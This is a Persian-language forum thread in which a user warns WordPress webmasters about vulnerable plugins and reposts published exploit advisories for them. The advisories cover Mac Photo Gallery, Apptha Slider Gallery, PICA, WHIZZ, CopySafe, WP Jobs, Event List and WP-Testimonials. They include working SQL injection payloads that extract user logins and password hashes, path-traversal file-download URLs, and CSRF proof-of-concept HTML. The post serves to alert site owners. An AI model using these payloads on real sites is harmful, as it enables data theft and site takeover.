آیا میدانید شما میتوانید به صورت "کاملا رایگان" سایت ، محصول خدمات و... خود را در پی سی وب معرفی کنید ؟

فرصت را از دست ندهید
انجمن مه سفر
نمایش نتایج: از 1 به 2 از 2

موضوع: مهم : مراقب این پلاگین های وردپرس باشید

  1. Ahmadreza آواتار ها
    Ahmadreza
    پاسخگو و راهنما
    Oct 2015
    1,657
    1775
    1,434
    1,762
    71

    مهم : مراقب این پلاگین های وردپرس باشید

    سلام
    کاربران و وبمستران که از وردپرس استفاده می کنند، خوشبختانه امنیتی قابل قبولی در مواجه با هکر ها دارند البته به خاطر نسخه 3.7 به بعد!
    اما جای نگرانی همیشه هست، از این رو برخی از پلاگین هایی که در زیر هست رو سعی کنید استفاده نکنید و یا نسخه جدید آن را استفاده کنید.
    WordPress Plugin Mac Photo Gallery 3.0 - Arbitrary File Download
    کد:
    # # # # # 
    # Exploit Title: WordPress Plugin Mac Photo Gallery v3.0 - Arbitrary File Download
    # Google Dork: N/A
    # Date: 09.03.2017
    # Vendor Homepage: https://www.apptha.com/
    # Software: https://www.apptha.com/category/exte...-Photo-Gallery
    # Demo: http://www.apptha.com/demo/mac-photo-gallery
    # Version: 3.0
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[@]ihsan[.]net
    # # # # #
    # Exploit :
    # http://localhost/[PLUGIN_PATH]/macdownload.php?albid=../../../wp-load.php
    # Etc..
    # # # # #

    WordPress Plugin Apptha Slider Gallery 1.0 - SQL Injection
    کد:
    # # # # # 
    # Exploit Title: WordPress Plugin Apptha Slider Gallery v1.0 - SQL Injection
    # Google Dork: N/A
    # Date: 09.03.2017
    # Vendor Homepage: https://www.apptha.com/
    # Software: https://www.apptha.com/category/exte...slider-gallery
    # Demo: http://www.apptha.com/demo/apptha-slider-gallery
    # Version: 1.0
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[@]ihsan[.]net
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/?albid=[SQL]
    # For example;
    # -3+/*!50000union*/+select+1,2,3,4,5,0x496873616e2053656e63616e20207777772e696873616e2e6e6574,concat(user_login,0x3a,user_pass),8,9,10,11,12,13,14+from+pleasant_users--+-&pid=6
    # admin:$P$BKL0XND.tfopqZH6S.QU.vhgjuVchx1
    # Etc..
    # # # # #
    WordPress Plugin Apptha Slider Gallery 1.0 - Arbitrary File Download
    کد:
    # # # # # 
    # Exploit Title: WordPress Plugin Apptha Slider Gallery v1.0 - Arbitrary File Download
    # Google Dork: N/A
    # Date: 09.03.2017
    # Vendor Homepage: https://www.apptha.com/
    # Software: https://www.apptha.com/category/exte...slider-gallery
    # Demo: http://www.apptha.com/demo/apptha-slider-gallery
    # Version: 1.0
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[@]ihsan[.]net
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PLUGIN_PATH]/asgallDownload.php?imgname=../../../wp-load.php
    # Etc..
    # # # # #
    WordPress Plugin PICA Photo Gallery 1.0 - SQL Injection
    کد:
    # # # # # 
    # Exploit Title: WordPress Plugin PICA Photo Gallery v1.0 - SQL Injection
    # Google Dork: N/A
    # Date: 09.03.2017
    # Vendor Homepage: https://www.apptha.com/
    # Software: https://www.apptha.com/category/exte...-Photo-Gallery
    # Demo: http://www.apptha.com/demo/pica-photo-gallery
    # Version: 1.0
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[@]ihsan[.]net
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/?aid=[SQL]
    # For example;
    # -3+/*!50000union*/+select+0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,2,3,@@version--+-
    # wpapptha_term_relationships,wpapptha_term_taxonomy,wpapptha_terms,wpapptha_usermeta,wpapptha_users
    # Etc..
    # # # # #
    WordPress Plugin WHIZZ < 1.1.1 - Cross-Site Request Forgery
    کد:
    ======
    Software: WordPress WHIZZ
    Version: <1.1.1
    Homepage: https://wordpress.org/plugins/whizz/
    =======
     
    Description
    ================
    Get type CSRF in WordPress WHIZZ allows attackers to delete any wordpress users and change plugins status
     
    POC:
    ========
    include in the page ,then attack will occur:
     
    delete user:
     
    <img src="http://127.0.0.1/wordpress/wp-admin/...t_of=all_users">
     
     
    active or disactive plugins:
     
    <img src="http://127.0.0.1/wordpress/wp-admin/..._view&list_of=">
     
    <img src="http://127.0.0.1/wordpress/wp-admin/..._view&list_of=">
     
     
    Mitigations
    ================
    Disable the plugin until a new version is released that fixes this bug.
     
     
    FIX:
    ==========
    https://wordpress.org/plugins/whizz/ 1.1.1 changelog->Specifically



    #1 ارسال شده در تاريخ 06-18-2017 در ساعت 05:13 PM

  2. کاربر مقابل پست Ahmadreza عزیز را پسندیده است .


  3. Ahmadreza آواتار ها
    Ahmadreza
    پاسخگو و راهنما
    Oct 2015
    1,657
    1775
    1,434
    1,762
    71
    WordPress Plugin CopySafe Web Protect < 2.6 - Cross-Site Request Forgery
    کد:
    <!--
    =======
    Software: CopySafe Web
    version: <2.6
    description: Add copy protection from PrintScreen and screen capture. Copysafe Web uses encrypted images and domain lock to extend copy protection for all media displayed on a web page.
    ========
     
    Description
    ==========
    CSRF in wordpress copysafe web allows attacker changes plugin settings
     
    ========
     
    POC:
    =======
    -->
     
    <form method="POST" action="http://127.0.0.1/wordpress/wp-admin/...wpcsw_settings">
     
      <input type="text" name= "admin_only" value="checked">
     
     <input type="text" name="asps" value="">
     <input type="text" name="upload_path" value="">
     <input type="text" name="max_size" value="">
     <input type="text" name="mode" value=“checked”>
     <input type=“text” name="submit” value="Save Settings”>
       <input type="submit”>
    </form>
     
    <!--
     
    =========
    Mitigations
    ================
    Disable the plugin until a new version is released that fixes this bug.
     
    Fixed
    =========
    https://wordpress.org/plugins/wp-copysafe-web/ changelog ->2.6 realease
    -->
    WordPress Plugin WP Jobs < 1.5 - SQL Injection
    کد:
    # Exploit Title: WordPress Plugin WP Jobs < 1.5 - SQL Injection
    # Date: 11-06-2017
    # Exploit Author: Dimitrios Tsagkarakis
    # Website: dtsa.eu 
    # Software Link: https://en-gb.wordpress.org/plugins/wp-jobs/
    # Vendor Homepage: http://www.intensewp.com/
    # Version: 1.4
    # CVE : CVE-2017-9603
    # Category: webapps
     
      
     
    1. Description:
     
        
     
    SQL injection vulnerability in the WP Jobs plugin before 1.5 for WordPress
    allows authenticated users to execute arbitrary SQL commands via the jobid
    parameter to wp-admin/edit.php. 
     
      
     
    2. Proof of Concept:
     
      
     
    http://[wordpress_site]/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&j
    obid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL-- comment
     
      
     
    3. Solution:
     
        
     
    A new version of WP Jobs is available. Update the WordPress WP Jobs to the
    latest version.
     
      
     
    4. Reference:
     
      
     
    http://dtsa.eu/cve-2017-9603-wordpre...njection-sqli/
     
    http://www.cve.mitre.org/cgi-bin/cve...name=2017-9603

    WordPress Plugin Event List <= 0.7.8 - SQL Injection
    کد:
    # Exploit Title: WordPress Plugin Event List <= 0.7.8 - SQL Injection
    # Date: 04-06-2017
    # Exploit Author: Dimitrios Tsagkarakis
    # Website: dtsa.eu 
    # Software Link: https://wordpress.org/plugins/event-list/
    # Version: 0.7.8
    # CVE : CVE-2017-9429
    # Category: webapps
     
      
     
    1. Description:
     
        
     
    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    allows an authenticated user to execute arbitrary SQL commands via the id
    parameter to wp-admin/admin.php. 
     
      
     
    2. Proof of Concept:
     
      
     
    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id
    =1 AND SLEEP(10)
     
      
     
    3. Solution:
     
        
     
    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    for a hotfix.
     
      
     
    4. Reference:
     
      
     
    http://dtsa.eu/cve-2017-9429-event-l...based-sql-inje
    ction-sqli/
     
    http://www.cve.mitre.org/cgi-bin/cve...name=2017-9429
    WordPress Plugin WP-Testimonials < 3.4.1 - SQL Injection
    کد:
    # Exploit Title: WP-Testimonials < 3.4.1 Union Based SQL Injection
    # Date: 03-06-2017
    # Exploit Author: Dimitrios Tsagkarakis
    # Website: dtsa.eu 
    # Software Link: https://en-gb.wordpress.org/plugins/wp-testimonials/
    # Vendor Homepage: http://www.sunfrogservices.com/web-p...-testimonials/
    # Version: 3.4.1
    # CVE : CVE-2017-9418
     
    # Category: webapps
     
      
     
    1. Description:
     
        
     
    SQL injection vulnerability in the WP-Testimonials plugin 3.4.1 for
    WordPress allows an authenticated user to execute arbitrary SQL commands via
    the testid parameter to wp-admin/admin.php.
     
    2. Proof of Concept:
     
    http://[wordpress_site]/wp-admin/admin.php?page=sfstst_manage&mode=sfststedi
    t&testid=-1 UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL--
    comment
     
    3. Solution:
     
        
     
    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    for a hotfix.
     
      
     
    4. Reference:
     
    http://dtsa.eu/wp-testimonials-wordp...based-sql-inje
    ction-sqli/
     
    http://www.cve.mitre.org/cgi-bin/cve...name=2017-9418



    #2 ارسال شده در تاريخ 06-18-2017 در ساعت 05:14 PM

  4. کاربر مقابل پست Ahmadreza عزیز را پسندیده است .


اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •  

Designed With Cooperation

Of Creatively